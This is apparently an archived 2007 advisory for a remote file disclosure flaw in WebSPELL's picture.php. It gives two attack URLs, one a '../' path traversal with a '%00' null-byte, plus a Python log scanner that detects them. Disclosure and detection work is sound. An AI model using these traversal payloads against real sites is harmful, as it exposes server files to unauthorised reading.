WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

2007-04-12T00:00:00
ID SECURITYVULNS:DOC:16679
Type securityvulns
Reporter Securityvulns
Modified 2007-04-12T00:00:00

Description

Discovered by: Trex

Visit: www.Trex-Online.net / www.UnderGround.ag

Comment: Happy easter!

Vulnerability 1:

Advantage: works independently of the PHP version.

Disadvantage: depends on the PHP option register_globals (= on).

http://[SITE][PATH]/picture.php?file=[FILE]

Vulnerability 2:

Advantage: works independently of the PHP option register_globals.

Disadvantage: depends on the PHP version (< 4.3.0).

http://[SITE][PATH]/picture.php?id=../../../[FILE]%00
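A log-review check for the two request patterns above, as an added example that is not part of the original advisory: it flags requests to picture.php that carry a `file` parameter, or an `id` value containing path traversal or a NUL byte. The access-log layout (Apache combined style), the `/webspell/` path, the addresses and the file name are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

def classify(target):
    """Return the advisory vectors matched by one request target."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() != "picture.php":
        return []
    # parse_qs percent-decodes values, so %00 arrives here as a NUL character.
    params = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    if "file" in params:
        # Vulnerability 1: client-supplied "file" (effective with register_globals on).
        hits.append("file-param")
    for value in params.get("id", []):
        value = unquote(value)  # second pass also catches double encoding (%2500)
        if "\x00" in value:
            hits.append("id-null-byte")   # Vulnerability 2: %00 truncation
        if TRAVERSAL_RE.search(value):
            hits.append("id-traversal")   # Vulnerability 2: ../ sequence
    return hits

def scan(log_lines):
    """Return (line_number, hits) for every log line that matches a vector."""
    found = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        hits = classify(match.group(1)) if match else []
        if hits:
            found.append((number, hits))
    return found

# Constructed sample log lines (documentation addresses, made-up file name).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/2007:10:00:01 +0000] "GET /webspell/picture.php?id=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Apr/2007:10:02:13 +0000] "GET /webspell/picture.php?file=example.txt HTTP/1.1" 200 311',
    '198.51.100.7 - - [12/Apr/2007:10:05:40 +0000] "GET /webspell/picture.php?id=../../../example.txt%00 HTTP/1.1" 200 311',
    '198.51.100.7 - - [12/Apr/2007:10:05:52 +0000] "GET /webspell/picture.php?id=..%252f..%252fexample.txt%2500 HTTP/1.0" 200 0',
    '192.0.2.10 - - [12/Apr/2007:10:06:00 +0000] "GET /webspell/index.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```
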

Solution:

http://fixes.trex-online.net/picture.rar

milw0rm.com [2007-04-05]